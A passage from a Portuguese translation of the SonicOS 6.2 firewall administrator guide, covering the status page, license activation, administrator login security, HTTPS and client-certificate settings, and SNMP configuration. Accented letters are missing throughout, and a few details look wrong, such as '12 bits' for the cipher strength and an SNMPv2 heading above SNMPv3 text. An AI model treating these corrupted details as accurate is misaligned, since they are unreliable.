partir de Painel > Monitor de log ou Log > Ver. As duas pginas fornecem funcionalidade
idntica. Para obter informaes sobre como usar o Monitor de log, consulte Log >
Monitoramento de log na pgina 1317.

Parte 3
Sistema
| 91
Captulo 3
Exibindo informaes de status
Sistema > Status

A pgina Sistema > Status fornece informaes do sistema, como a verso de firmware e o
tempo de funcionamento do sistema, o status de licena de servios de segurana, por
mensagens de alerta de lmina de firewall e atribuies de zona de interface de rede e o status
do link.
Esta pgina de status inclui as informaes sobre o dispositivo de segurana da Dell

SonicWALL organizadas em cinco sees: Mensagens do sistema, Informaes do
sistema, Servios de segurana, ltimos alertas e Interfaces de rede.
Mensagens do sistema na pgina 94
Informaes do sistema na pgina 94
Exibindo informaes de status | 93

ltimos alertas na pgina 95
Servios de segurana na pgina 95
Interfaces de rede na pgina 96
Mensagens do sistema
As informaes consideradas relativas a possveis problemas com as configuraes no
dispositivo de segurana da Dell SonicWALL como senha, mensagens de log, bem como as
notificaes de ofertas de servios de segurana da Dell SonicWALL, novas notificaes de
firmware e futuras expiraes do servio de segurana so exibidas na seo Mensagens do
sistema.
Informaes do sistema
As informaes a seguir so exibidas nesta seo:
Modelo produto Tipo de dispositivo de segurana da Dell SonicWALL.
Cdigo de produto o cdigo numrico para o modelo do Dispositivo de Segurana Dell
SonicWALL.
Nmero de srie tambm o endereo MAC do dispositivo de segurana da Dell
SonicWALL.
Cdigo de autenticao o cdigo alfanumrico usado para autenticar o dispositivo de
segurana da Dell SonicWALL no banco de dados de registro em https://www.mysonicwall.com.
Verso de firmware - a verso do firmware carregado no dispositivo de segurana da Dell
SonicWALL.
Verso de modo de segurana a verso de firmware de modo de segurana carregado
no dispositivo de segurana da Dell SonicWALL.
Verso de ROM indica a verso de ROM.
CPUs exibe o uso mdio de CPU nos ltimos 10 segundos e o tipo do processador do
Memria total indica a quantidade de RAM e a memria flash.
Hora do sistema o tempo registrado no relgio interno no dispositivo de segurana da
Dell SonicWALL.
Tempo de funcionamento o perodo de tempo, em dias, horas e segundos em que o
dispositivo de segurana da Dell SonicWALL est ativo.
Conexes exibe o nmero mximo de conexes de rede que o dispositivo de segurana
da Dell SonicWALL pode suportar, o nmero mximo de conexes simultneas e o nmero
atual de conexes.
Uso da conexo a porcentagem do nmero mximo de conexes estabelecidas no
momento (por exemplo, essa porcentagem o nmero atual de conexes dividido pelo
nmero mximo de conexes).
ltima modificao por o endereo IP do usurio que modificou o sistema pela ltima
vez e o registro de data/hora da ltima modificao.
Cdigo de registro o cdigo de registro ser gerado quando o dispositivo de segurana
da Dell SonicWALL for registrado em http://www.mysonicwall.com.
94 | SonicOS 6.2 Administrator Guide

ltimos alertas
As mensagens relacionadas a erros do sistema ou ataques so exibidas nesta seo. As
mensagens de ataque incluem Alertas AV, anexos de e-mail proibidos, certificados
fraudulentos, etc. Os erros de sistema incluem IP da WAN alterado e erros de criptografia.
Clicar na seta azul exibe a pgina Log > Ver.
Para obter mais informaes sobre registro de dispositivo de segurana da Dell SonicWALL,
consulte Log > View on page 1261.
Servios de segurana
Se o dispositivo de segurana da Dell SonicWALL no estiver registrado em mysonicwall.com,
a seguinte mensagem ser exibida na pasta Servios de segurana: O dispositivo de
segurana da Dell SonicWALL no est registrado. Clique aqui para registrar o
dispositivo de segurana da Dell SonicWALL. necessrio uma conta mysonicwall.com
para registrar o dispositivo de segurana da Dell SonicWALL ou para ativar os servios de
segurana. possvel criar uma conta mysonicwall.com diretamente da interface de
gerenciamento da Dell SonicWALL.
Se o dispositivo de segurana da Dell SonicWALL estiver registrado, uma lista de servios de

segurana disponvel da Dell SonicWALL estar listada nesta seo com o status de
Licenciado ou No licenciado. Se Licenciado, a coluna Status exibir o nmero de licenas
e o nmero de licenas em uso. Clicar no cone seta exibe a pgina Sistema > Licenas na
interface de gerenciamento baseado na web da Dell SonicWALL. O registro de servios de
segurana da Dell SonicWALL e de dispositivo de segurana da Dell SonicWALL gerenciado
por mysonicwall.com.
Consulte Servios de segurana na pgina 1155 para obter mais informaes sobre os
servios de segurana da Dell SonicWALL e sobre como ativ-los no dispositivo de segurana
da Dell SonicWALL.
Exibindo informaes de status | 95

Interfaces de rede
As Interfaces de rede exibem informaes sobre as interfaces para o firewall. Clicar na seta
azul exibe a pgina Rede > Interfaces para configurar as definies de Rede. As interfaces
disponveis exibidas na seo de Interfaces de rede dependem do modelo do dispositivo de

Captulo 4
Gerenciando licenas da Dell SonicWALL
Sistema > Licenas

A pgina Sistema > Licenas fornece links para ativar, atualizar ou renovar as licenas dos
Servios de Segurana da Dell SonicWALL. Nessa pgina, na Interface de Gerenciamento da
Dell SonicWALL, possvel gerenciar todos os Servios de Segurana da Dell SonicWALL
licenciados para seu Dispositivo de Segurana Dell SonicWALL. As informaes listadas na
tabela Resumo de servios de segurana so atualizadas da sua conta do mysonicwall.com.
A pgina Sistema > Licenas tambm inclui links para avaliaes GRATUITAS dos Servios
de Segurana da Dell SonicWALL.
Gerenciando licenas da Dell SonicWALL | 97

Status da licena de ns
Um n um computador ou outro dispositivo conectado sua LAN com um endereo IP.
Se seu firewall estiver licenciado para ns ilimitados, a seo Status da licena de ns exibir
a mensagem: O SonicWALL est licenciado para um nmero ilimitado de Ns/Usurios.
Nenhuma outra configurao exibida.
Se seu firewall no estiver licenciado para ns ilimitados, a tabela Status da licena do n
lista o nmero de ns que seu dispositivo de segurana est licenciado para ter conectado a
qualquer momento, o nmero de ns que esto atualmente conectados e o nmero de ns em
sua Lista de excluso da licena do n.
A tabela Ns atualmente licenciados lista detalhes sobre cada n conectado ao seu

dispositivo de segurana. A tabela no ser exibida se nenhum n estiver conectado.
Excluindo um n
Ao excluir um n, possvel bloque-lo de se conectar sua rede por meio do dispositivo de
segurana. Excluir um n cria um objeto de endereo para esse endereo IP e o atribui ao
grupo de endereo da Lista de excluso da licena do n. Para excluir um n:
Etapa 1 Selecione o n que voc deseja excluir na tabela Ns atualmente licenciados na pgina
Sistema > Licenas e clique no cone da coluna Excluir desse n.
Etapa 2 Um aviso exibido, informando que a excluso desse n criar um objeto de endereo para
ele e o colocar no grupo de endereos da Lista de excluso da licena. Clique em OK para
excluir o n.
possvel gerenciar objetos de grupo e endereos da Lista de excluso da licena na pgina
Rede > Objetos de endereo da interface de gerenciamento. Clique no link Lista de excluso
da licena do n para ir para a pgina Rede > Objetos de endereo. Consulte para obter
instrues sobre como gerenciar os objetos de endereo.
Resumo dos servios de segurana

A tabela Resumo de servios de segurana lista os servios de segurana disponveis e
ativados no firewall.
A coluna Servio de segurana lista todos os Servios de Segurana da Dell SonicWALL
disponveis e atualizaes disponveis para o Dispositivo de Segurana Dell SonicWALL. A
coluna Status indica se o servio de segurana est ativado (Licenciado), disponvel para
ativao (No licenciado) ou se no est mais ativo (Expirado). O nmero de ns/usurios
permitido para a licena exibido na coluna Contagem. A coluna Expirao exibe a data de
expirao para os Servios de segurana licenciados.
As informaes listadas na tabela Resumo dos servios de segurana sero atualizadas da
sua conta do mysonicwall.com na prxima vez que o Dispositivo de Segurana Dell
SonicWALL sincronizar automaticamente com a sua conta do mysonicwall.com (uma vez por
dia) ou voc pode clicar no link em Para sincronizar licenas com o mysonicwall.com,
clique aqui na seo Gerenciar servios de segurana on-line.

Para obter mais informaes sobre os Servios de Segurana da Dell SonicWALL, consulte
Servios de segurana na pgina 1155.
Gerenciar servios de segurana online

Para ativar, atualizar ou renovar servios, clique no link em Para ativar, fazer upgrade ou
renovar servios, clique aqui. Clique no link em Para sincronizar licenas com o
mysonicwall.com, clique aqui para sincronizar sua conta do mysonicwall.com com a tabela
Resumo dos servios de segurana.
Tambm possvel obter assinaturas de avaliao grtis para o Dell SonicWALL Content Filter
Service e Client Anti-Virus, clicando no link Para avaliaes gratuitas, clique aqui. Ao clicar
nesses links, a pgina de Logon mysonicwall.com exibida.
Digite seu nome de usurio e sua senha no mySonicWALL.com nos campos Nome de usurio
e Senha e clique em Enviar. A pgina Gerenciar servios on-line exibida contendo
informaes sobre o licenciamento da sua conta do mysonicwall.com.

Atualizao manual
A Atualizao manual permite a ativao de seus servios, por meio da digitao da chave
de ativao do servio fornecida com a assinatura do servio no ativado no mysonicwall.com.
Digite a chave de ativao do produto no campo Inserir chave de upgrade e clique em Enviar.
Atualizao manual para ambientes fechados

Se seu Dispositivo de Segurana Dell SonicWALL for implementado em um ambiente de alta
segurana que no permita a conectividade direta com a Internet a partir do Dispositivo de
Segurana Dell SonicWALL, possvel inserir as informaes da chave de licena
criptografada do http://www.mysonicwall.com manualmente na pgina Sistema > Licenas da
Interface de Gerenciamento da Dell SonicWALL.
Nota A atualizao manual do Conjunto de chaves criptografadas da licena vlida somente

para Ambientes fechados. Se seu firewall estiver conectado Internet, recomendvel
usar o registro automtico e os recursos de atualizao dos Servios de segurana do seu
dispositivo.
A partir de um computador conectado Internet
Etapa 1 Antes de continuar, verifique se voc possui uma conta no http://www.mysonicwall.com e se

seu Dispositivo de Segurana Dell SonicWALL est registrado para a conta.
Etapa 2 Depois de efetuar login no www.mysonicwall.com, clique no seu Dispositivo de Segurana Dell
SonicWALL registrado listado em Produtos registrados da SonicWALL.
Etapa 3 Clique no link Exibir conjunto de chaves da licena. O texto criptografado exibido na caixa
de texto o Conjunto de chaves da licena para o Dispositivo de Segurana Dell SonicWALL
selecionado e os Servios de segurana ativados. Copie o texto do Conjunto de chaves para
colar na pgina Sistema > Licenas ou imprima a pgina se voc deseja inserir manualmente
o Conjunto de chaves no Dispositivo de Segurana Dell SonicWALL.

A partir da Interface de Gerenciamento do Dispositivo de Segurana Dell SonicWALL
Etapa 1 Verifique se o Dispositivo de Segurana Dell SonicWALL est executando a verso mais
recente do SonicOS.
Etapa 2 Cole (ou insira) o Conjunto de chaves (da etapa 3) no campo do Conjunto de chaves na seo
Atualizao manual da pgina Sistema > Licenas(SonicOS).
Etapa 3 Clique no boto Enviar ou Aplicar para atualizar o Dispositivo de Segurana Dell SonicWALL.
O campo de status na parte inferior da pgina exibe a mensagem: "A configurao foi
atualizada".
Etapa 4 possvel gerar o Sistema > Diagnstico > Relatrio do suporte tcnico para verificar os
detalhes da atualizao.
Nota Aps a atualizao manual, a pgina Sistema > Licenas no conter nenhuma
informao do registro e da atualizao.
Cuidado A mensagem de aviso: necessrio fazer a Atualizao do registro do SonicWALL. Atualize

suas informaes do registro; elas permanecero na pgina Sistema > Status aps o
registro do Dispositivo de Segurana Dell SonicWALL. Ignorar esta mensagem.

Captulo 5
Definindo as configuraes de
administrao
Sistema > Administrao

A pgina de Administrao de sistema fornece definies para a configurao do Dispositivo
de Segurana da Dell SonicWALL para o gerenciamento remoto e seguro.
Definindo as configuraes de administrao | 103

Voc pode gerenciar o firewall usando uma variedade de mtodos, incluindo HTTPS, SNMP
ou Sistema de gerenciamento global do SonicWALL (SonicWALL GMS).
Nome do firewall na pgina 104
Nome e senha do administrador na pgina 104
Configuraes de segurana de login na pgina 105
Configuraes de Gerenciamento da Web na pgina 107
Configuraes de gerenciamento SSH na pgina 112
Gerenciamento avanado na pgina 112
URL de download na pgina 116
Nome do firewall
O Nome do firewall exclusivamente identifica o Dispositivo de Segurana Dell SonicWALL e
os padres para o nmero de srie do dispositivo de segurana de rede da Dell SonicWALL.
O nmero de srie tambm o endereo MAC da unidade. Para alterar o Nome do firewall,
digite um nome exclusivo alfanumrico no campo Nome do firewall. Deve ter pelo menos 8
caracteres de comprimento.
Nome e senha do administrador

O Nome do administrador pode ser alterado da configurao padro admin para qualquer
palavra usando caracteres alfanumricos at 32 caracteres de comprimento. Para criar um
novo nome de administrador, digite o novo nome no campo Nome do administrador. Clique
em Aceitar para que as alteraes tenham efeito no firewall.
Alterando a senha de administrador

Para definir uma nova senha para acesso na Interface de Gerenciamento do Dell SonicWALL,
digite a senha antiga no campo Senha antiga e a nova senha no campo Nova senha. Digite
a nova senha novamente no campo Confirmar nova senha e clique em Aceitar. Depois que
o firewall for atualizado, exibida uma mensagem confirmando a atualizao na parte inferior
da janela do navegador.
Dica Recomenda-se que voc altere a senha padro "senha" para sua prpria senha
personalizada.
Senha de uso nico

A Senha de uso nico (OTP) um esquema de autenticao de dois fatores que utiliza senhas
aleatrias geradas pelo sistema, alm de credenciais de nome de usurio e senha padro.
Uma vez que os usurios enviam as credenciais de login bsicas corretas, o sistema gera uma
senha de uso nico, que enviada para o usurio em um endereo de e-mail predefinido. O
usurio deve recuperar a senha de uso nico dos seus e-mails e digit-la na tela de login.

Configuraes de segurana de login
O Servidor Web Dell SonicWALL interno agora suporta apenas verso SSL 3.0 e TLS com
codificao seguras (12 bits ou superior) ao negociar sesses de gerenciamento HTTPS. No
h suporte a implementaes de SSL antes da verso 3.0 e cdigos fracos (codificao
simtrica menor que 128 bits). Esse nvel maior de segurana HTTPS protege contra possveis
vulnerabilidades de reverso de SSLv2 e garante a conformidade com a Indstria de Carto
de Pagamento (PCI) e outros padres de segurana e gerenciamento de riscos.
Dica O SonicOS usa tecnologias avanadas de navegador, como HTML5, que so suportadas
na maioria dos navegadores mais recentes. A Dell SonicWALL recomenda o uso dos
navegadores Chrome, Firefox, Internet Explorer ou Safari mais recentes para a
administrao do SonicOS. Navegadores de dispositivos mveis no so recomendados
para a administrao de sistema dos dispositivos Dell SonicWALL.
A configurao de imposio de restrio de senha do SonicOS garante que os

administradores e usurios estejam usando senhas seguras. Esta imposio da restrio de
senha pode satisfazer os requisitos de confidencialidade conforme definido por sistemas de
gerenciamento de segurana de informaes atuais ou requisitos de conformidade, como
Critrios Comuns e o padro da Indstria de Cartes de Pagamento (PCI).
As configuraes de A senha deve ser alterada a cada (dias) requer que os usurios alterem
suas senhas aps o nmero de dias designado decorrido. Quando um usurio tenta fazer login
com uma senha expirada, uma janela pop-up solicitar ao usurio para inserir uma nova
senha. A janela Status de login do usurio agora inclui um boto Alterar senha para que os
usurios possam alterar suas senhas a qualquer momento.
A configurao Barrar senhas repetidas aps este nmero de alteraes obriga os usurios
a usarem senhas nicas para um nmero especfico de alteraes de senha.
A configurao Impor um comprimento mnimo de senha de define a senha mnima
permitida.
O menu suspenso Impor complexidade da senha fornece as seguintes opes:
Necessita de caracteres numricos e alfabticos

Necessita de caracteres alfabticos, numricos e simblicos
As caixas de seleo Aplicar restries de senha indicadas acima para especificam a quais
classes de usurios as restries de senha so aplicadas. A caixa de marcao administrador
se refere ao administrador padro com o nome de usurio admin.
A configurao de Tempo limite de inatividade do Administrador aps inatividade de
(minutos) permite que voc defina o perodo de tempo de inatividade decorrido antes que voc
seja conectado automaticamente sem a Interface de Gerenciamento. Por padro, o Dispositivo
de Segurana Dell SonicWALL registra logout do administrador aps cinco minutos de
inatividade. O tempo limite de inatividade pode variar de 1 a 99 minutos. Clique em Aceitar e
uma mensagem confirmando a atualizao exibida na parte inferior da janela do navegador.
Dica Se o Tempo limite de inatividade do administrador for estendida alm de cinco minutos,
voc dever encerrar cada sesso de gerenciamento clicando em Efetuar logout para
impedir o acesso no autorizado Interface de gerenciamento do firewall.
A configurao Habilitar bloqueio de administrador/usurio bloqueia os administradores de

acessarem o dispositivo aps o nmero especificado de tentativas de login incorretas.
Tentativas de login com falha por minuto antes do bloqueio especifica o nmero de
tentativas de login incorretas em um perodo de um minuto para acionar um bloqueio.
Perodo de bloqueio (minutos) especifica o nmero de minutos que o administrador est
bloqueado.
Vrios administradores
A configurao Em apropriao por outro administrador configura o que acontece quando
um administrador apropria outro administrador usando o recurso Mltiplos administradores. O
administrador superado pode ser convertido em modo de no configurao ou desconectado.
Para obter mais informaes sobre vrios administradores, consulte Viso geral do Suporte
para mltiplos administradores na pgina 969.
Passar para o modo no-config Selecione para permitir que mais de um administrador
acesse o dispositivo no modo no-config sem interromper o administrador atual.
Log-Out - Selecione para que o novo administrador substitua o administrador atual.
Permitir preempo por um administrador de prioridade mais baixa aps inatividade de
(minutos) Insere o nmero de minutos de inatividade do administrador atual que permitir
que um administrador de menor prioridade aproprie-se.
Habilitar sistema de mensagens entre administradores Selecione para permitir que os
administradores enviem mensagens de texto por meio da interface de gerenciamento para
outros administradores conectados no dispositivo. A mensagem aparecer na barra de status
do navegador.
Intervalo do sondagem para mensagens (segundos) Define a frequncia com que o
navegador do administrador ir verificar as mensagens entre administradores. Se houver a
probabilidade de vrios administradores precisarem acessar o dispositivo, isso deve ser
definido para um intervalo relativamente curto para garantir a entrega de mensagens em tempo
hbil.

Habilitar bloqueio de administrador/usurio
Voc pode configurar o firewall para bloqueio de um administrador ou de um usurio se as
credenciais de login estiverem incorretas. Selecione a caixa de seleo Habilitar bloqueio de
administrador/usurio em caso de falha de login para impedir que os usurios tentem fazer
login no firewall sem credenciais de autenticao adequadas. Digite o nmero de tentativas
falhadas antes que o usurio seja bloqueado no campo Tentativas de login com falha por
minuto antes do bloqueio. Insira a quantidade de tempo que dever decorrer antes de o
usurio tentar efetuar login no firewall novamente no campo Perodo de bloqueio (minutos).
Cuidado Se o administrador e um usurio esto efetuando login no firewall usando o mesmo

endereo IP de origem, o administrador tambm est bloqueado para o firewall. O bloqueio
baseado no Endereo IP de origem do usurio ou do administrador.
Configuraes de Gerenciamento da Web

O dispositivo de segurana SonicWALL pode ser gerenciado usando HTTP ou HTTPS e um
navegador da Web. O gerenciamento com base na Web HTTP est desabilitado por padro.
Use HTTPS para efetuar login na interface de gerenciamento do SonicOS com as
configuraes de fbrica padro.
Se voc desejar usar o gerenciamento de HTTP, uma caixa de seleo Permitir o
gerenciamento via HTTP est disponvel para permitir que o administrador habilite/desabilite
o gerenciamento HTTP globalmente:
O nmero da porta padro para gerenciamento HTTPS 443. Voc pode adicionar outra
camada de segurana para efetuar login no dispositivo de segurana SonicWALL ao alterar a
porta padro. Para configurar outra porta para o gerenciamento de HTTPS, digite o nmero da
porta preferencial no campo Porta e, em seguida, clique em Atualizar. Por exemplo, se voc

configurar a Porta de gerenciamento HTTPS para ser 700, voc ento dever efetuar login do
SonicWALL usando o nmero da porta, bem como o Endereo IP, por exemplo, <https://
192.168.168.1:700> para acessar o SonicWALL.
A porta padro para HTTP a porta 80, mas voc pode configurar o acesso por meio de outra
porta. Digite o nmero da porta desejada no campo Porta e, em seguida, clique em Aceitar.
No entanto, se voc configurar outra porta para o gerenciamento de HTTP, voc deve incluir o
nmero da porta quando usar o endereo IP para efetuar login no dispositivo de segurana
SonicWALL. Por exemplo, se voc configurar a porta para ser 76, voc dever digitar em
seguida <Endereo IP da LAN: 76 > no navegador da Web, ou seja, <http://192.168.168.1:76>.
O menu Seleo de certificado permite que voc use um certificado autoassinado (Usar Use
Selfsigned Certificate) que permite que voc continue usando um certificado sem fazer o
download de um novo cada vez que voc efetuar login no dispositivo de segurana
SonicWALL. Voc tambm pode escolher Importar certificado para selecionar um certificado
importado da pgina Sistema > Certificados para usar para autenticao na interface de
gerenciamento.
O boto Excluir cookies remove todos os cookies do navegador salvos pelo dispositivo
SonicWALL. Excluir cookies far com que voc perca as alteraes no salvas feitas na
Interface de gerenciamento.
Para ver a pgina Painel > Principais Malwares globais primeiro ao efetuar login, selecione
a caixa de seleo Usar a viso do painel do sistema como pgina inicial.
Verificao de certificado de cliente com carto de acesso comum

Na pgina Sistema > Administrao, em Configuraes de gerenciamento da Web, os
administradores de sistema podem ativar uma Verificao de Certificado do cliente para uso
com ou sem um Carto de acesso comum (CAC).
O Carto de acesso comum (CAC) um smart card do Departamento de Defesa dos Estados
Unidos usado por equipes militares e outras equipes governamentais e no governamentais
que necessitam de acesso altamente seguro pela internet. Um CAC usa criptografia e
autenticao de PKI.
Nota Usar um CAC requer um leitor de carto externo conectado em uma porta USB.
A Verificao de certificado do cliente foi desenvolvida para uso com um CAC; no entanto,
ela til em qualquer cenrio que exija um certificado do cliente em uma conexo HTTPS/SSL.
O suporte do CAC est disponvel para a certificao de cliente somente em conexes
HTTPS.
Nota CACs podem no funcionar com navegadores que no sejam o Microsoft Internet Explorer.
A caixa Habilitar verificao de certificado do cliente permite que voc ative ou desative a
verificao de certificado do cliente e suporte de CAC no dispositivo de segurana SonicWALL.
O menu suspenso Emissor do certificado de cliente contm uma lista dos emissores de
certificado de Autoridade de Certificao (CA) que esto disponveis para assinar o certificado
de cliente. Se a autoridade de certificao apropriada no estiver na lista, voc precisar
importar dessa autoridade de certificao para o dispositivo de segurana SonicWALL.
A caixa Habilitar verificao de OCSP permite habilitar ou desabilitar a verificao do
Protocolo de Status do Certificado (OCSP) para o certificado do cliente verificar se o certificado
ainda vlido e no foi revogado.

O campo URL do respondente OCSP contm o URL do servidor que ir verificar o status do
certificado do cliente. O URL do respondente OCSP geralmente incorporado dentro do
certificado de cliente e no precisa ser inserido. Se o certificado de cliente no tiver um link
OCSP, voc pode digitar o link do URL. O link deve apontar para Interface de Gateway Comum
(CGI) no lado do servidor que processa a verificao de OCSP. Por exemplo: http://
10.103.63.251/ocsp
Se voc usar a verificao de certificado de cliente sem um CAC, voc deve importar o
certificado de cliente manualmente para o navegador.
Se voc usar a Verificao de certificado de cliente com um CAC, o certificado de cliente
instalado automaticamente no navegador pelo middleware. Quando voc iniciar uma sesso
de gerenciamento atravs de HTTPS, a janela de seleo de certificado exibida solicitando
que voc confirme o certificado.
Depois de voc selecionar o certificado de cliente no menu suspenso, a conexo HTTPS/SSL

reiniciada e o dispositivo de segurana SonicWALL verifica o Emissor de certificado de
cliente para verificar se o certificado de cliente est assinado pela autoridade de certificao.
Se uma correspondncia for encontrada, exibida a pgina de login de administrador. Se
nenhuma correspondncia for encontrada, o navegador exibe a mensagem de falha de
conexo do navegador-padro, como:
...no pode exibir a pgina da Web!
Se o OCSP estiver habilitado, antes da pgina de login do administrador ser exibido, o
navegador executa uma verificao de OCSP e exibe a seguinte mensagem enquanto estiver
verificando.
Verificao de OCSP de certificado de cliente...
Se uma correspondncia for encontrada, a pgina de login de administrador exibida e voc
pode usar suas credenciais de administrador para continuar gerenciando o dispositivo de
segurana SonicWALL.
Se nenhuma correspondncia for encontrada, o navegador exibe a seguinte mensagem:
Falha na verificao de OCSP! Entre em contato com o administrador do sistema!
Ao usar o recurso de certificado de cliente, essas situaes podem bloquear o usurio do
dispositivo de segurana SonicWALL:
Habilitar verificao de certificado de cliente est marcada, mas nenhum certificado de
cliente est instalado no navegador.
Habilitar verificao de certificado de cliente est marcada e um certificado de cliente
est instalado no navegador, mas o Emissor do certificado de cliente no est
selecionado ou o Emissor do certificado de cliente errado est selecionado.
Habilitar verificao de OSCP est habilitada, mas o servidor OSCP no est disponvel
ou um problema de rede est impedindo que o dispositivo de segurana SonicWALL
acesse o servidor OSCP.

Para restaurar o acesso a um usurio que est bloqueado, os seguintes comandos CLI so
fornecidos:
desativar certificao de cliente do gerenciamento da web
desativar ocsp do gerenciamento da web
Alterando o Tamanho padro para tabelas da Interface de gerenciamento

A Interface de Gerenciamento da Dell SonicWALL permite que voc controle a exibio de
grandes tabelas de informaes em todas as tabelas na Interface de gerenciamento. Voc
pode alterar o tamanho de pgina de tabela-padro em todas as tabelas exibidas na Interface
de Gerenciamento do padro de 50 itens por pgina para qualquer tamanho desde 1 at 5000
itens. Algumas tabelas, incluindo Monitoramento de conexes ativas, Configuraes de VPN
e Viso de Log tm configuraes individuais para itens por pgina que so inicializadas no
momento do login para o valor configurado aqui. Assim que estas pginas forem visualizadas,
suas configuraes individuais so mantidas. As alteraes subsequentes efetuadas aqui
afetaro somente as seguintes pginas aps um novo login.
Para alterar o tamanho da tabela padro:
Etapa 1 Insira o nmero desejado de itens por pgina no campo Tamanho da tabela padro.
Etapa 2 Insira o intervalo desejado para atualizao automtica em segundo plano das tabelas de
Monitor (incluindo o Monitor do processo, Monitor de conexes ativas e de Estatsticas de
trfego de interface) em segundos no campo Intervalo de tempo para autoatualizao das
tabelas.
Etapa 3 Clique em Aceitar.
Dicas de ferramentas
O SonicOS inseriu dicas de ferramentas incorporadas para muitos elementos na UI do
SonicOS. Essas Dicas de ferramentas so pequenas janelas pop-up que so exibidas quando
voc passa o mouse sobre um elemento da interface do usurio. Elas fornecem breves
informaes que descrevem o elemento. As Dicas de ferramentas so exibidas em muitos
formulrios, botes, ttulos de tabela e entradas.
Nota Nem todos os elementos da interface do usurio tm Dicas de ferramentas. Se uma Dica
de ferramenta no for exibida aps posicionar seu mouse sobre um elemento por alguns
segundos, voc pode concluir com segurana que ele no tem uma Dica de ferramenta
associada.

Quando aplicvel, as Dicas de ferramentas exibem o mnimo, mximo e valores padro para
entradas do formulrio. Essas entradas so geradas diretamente a partir do firmware do
SonicOS para que os valores sejam corrigidos para a plataforma especfica e combinao de
firmware que voc est usando.
O comportamento das Dicas de ferramenta pode ser definido na pgina Sistema >
Administrao.
As Dicas de ferramenta esto habilitadas por padro. Para desabilitar as dicas de ferramenta,
desmarque a caixa de seleo Habilitar dica de ferramenta. possvel configurar o perodo
de tempo antes de as dicas de ferramenta serem exibidas:
Atraso de dica de ferramenta de formulrio durao, em milissegundos, antes de as
dicas de ferramenta serem exibidas para formulrios (as caixas onde voc insere texto).
Atraso de dica de ferramenta de boto durao, em milissegundos, antes de as dicas
de ferramenta serem exibidas para botes de opo e caixas de seleo.
Atraso de dica de ferramenta de texto durao, em milissegundos, antes de as dicas
de ferramenta serem exibidas para texto da interface de usurio.

Configuraes de gerenciamento SSH
Se voc usar SSH para gerenciar o firewall, voc pode alterar a porta SSH para segurana
adicional. A porta SSH padro 22.
Gerenciamento avanado
Voc pode gerenciar o Dispositivo de Segurana Dell SonicWALL usando SNMP ou o Sistema
de gerenciamento global do SonicWALL. Esta seo contm as subsees seguintes:
Ativando o Gerenciamento SNMP na pgina 113
Ativando o gerenciamento GMS na pgina 115
Para mais informaes sobre os Sistema de gerenciamento global do SonicWALL, v a

http://www.sonicwall.com.
SNMPv2
A Verso 3 do Protocolo de Gerenciamento de Rede (SNMPv3) um protocolo baseado em
padres interoperveis para gerenciamento de rede. O SNMPv3 fornece acesso seguro a
dispositivos por uma combinao de autenticao e criptografia de pacotes pela rede. Os
recursos de segurana fornecidos no SNMPv3 so:
Mensagem de integridade Garante que um pacote no seja alterado em trnsito.
Autenticao Determina se a mensagem de uma fonte vlida.
Criptografia Mistura o contedo de um pacote para evitar que ele seja visto por uma
origem no autorizada.
O SNMPv3 fornece para ambos modelos de segurana e nveis de segurana. Um modelo de
segurana uma estratgia de autenticao que configurada para um usurio e o grupo no
qual o usurio reside. Um nvel de segurana o nvel permitido de segurana dentro de um
modelo de segurana. Uma combinao de um modelo de segurana e um nvel de segurana
ir determinar qual mecanismo de segurana empregado ao lidar com um pacote SNMP. Trs
modelos de segurana esto disponveis: SNMPv1, SNMPv2c e SNMPv3.

A tabela a seguir identifica o que as combinaes de modelos de segurana e os nveis
significam:
Modelo Nvel Autenticao Criptografia Descrio

v1 noAuthNoPriv Cadeia de caracteres No Usa uma correspondncia de
de comunidade sequncia de caracteres de
comunidade para autenticao.
v2c noAuthNoPriv Cadeia de caracteres No Usa uma correspondncia de
de comunidade sequncia de caracteres de
comunidade para autenticao.
v3 noAuthNoPriv Nome de usurio No Usa uma correspondncia de nome de
usurio para autenticao.
v3 authNoPriv MD5 ou SHA No Fornece autenticao baseada nos
algoritmos HMAC-MD5 ou
HMAC-SHA.
v3 authPriv MD5 ou SHA DES Fornece autenticao baseada nos
algoritmos HMAC-MD5 ou
HMAC-SHA. Fornece a criptografia de
56 bits DES alm da autenticao
baseada no padro CBC-DES
(DES-56).
Ativando o Gerenciamento SNMP

SNMP (Protocolo de Gerenciamento de Rede Simples) um protocolo de rede usado por
Protocolo de Datagrama de Usurio (UDP) que permite que os administradores de rede
monitorem o status do firewall e recebam notificaes de eventos crticos conforme eles
ocorrem na rede. O Dispositivo de Segurana Dell SonicWALL oferece suporte a SNMP v1/v2c
e todos os grupos de Base de Informao de Gerenciamento II (MIB) relevantes, exceto egp
e at. O firewall responde a comandos de obteno de SNMP para MIBII por meio de qualquer
interface e oferece suporte a um Dell SonicWALL MIB personalizado para gerar mensagens de
interceptao. O Dell SonicWALL MIB personalizado est disponvel para download no site da
Dell SonicWALL e pode ser carregado no software de gerenciamento de SNMP de terceiros,
como HP Openview, Tivoli ou SNMPC.

Para habilitar o SNMP no Dispositivo de Segurana Dell SonicWALL, efetue login na interface de
gerenciamento e clique em Sistema e, ento, em Administrao. Selecione a caixa de seleo
Habilitar SNMP e, em seguida, clique em Configurar. A janela Configurar SNMP exibida.
Etapa 1 Digite o nome do host do firewall no campo Nome do sistema.

Etapa 2 Digite o nome do administrador da rede no campo Contato do sistema.
Etapa 3 Digite um endereo de e-mail, nmero de telefone ou nmero de pgina no campo Local do
sistema.
Etapa 4 Digite um nome para um grupo ou uma comunidade de administradores que podem visualizar
dados SNMP no campo Obter nome da comunidade.
Etapa 5 Digite um nome para um grupo ou uma comunidade de administradores que podem visualizar
as interceptaes SNMP no campo Capturar nome da comunidade.
Etapa 6 Digite o endereo IP ou o nome do host do sistema de gerenciamento SNMP recebendo
interceptaes SNMP nos campos Host 1 a Host 4. Voc deve configurar pelo menos um
endereo IP ou nome de host. Porm, possvel usar at quatro endereos ou nomes de host.
Etapa 7 Clique em OK.
Configurando Log/Configuraes de log para o SNMP

As mensagens de desvio so geradas apenas para as categorias de mensagem de alerta
normalmente enviadas pelo firewall. Por exemplo, ataques, erros de sistema ou sites da Web
bloqueados geram mensagens de interceptao. Se nenhuma das categorias estiver
selecionada na pgina Log > Configuraes, ento nenhuma mensagem de interceptao
gerada.
Configurando o SNMP como um servio e adicionando regras

Por padro, o SNMP est desativado no Dispositivo de Segurana Dell SonicWALL. Para ativar
o SNMP, voc deve habilitar primeiro o SNMP na pgina Sistema > Administrao e, em
seguida, ativ-lo para interfaces individuais. Para configurar isso, v a Rede > Interfaces e
clique no boto Configurar para a interface na qual deseja ativar o SNMP.
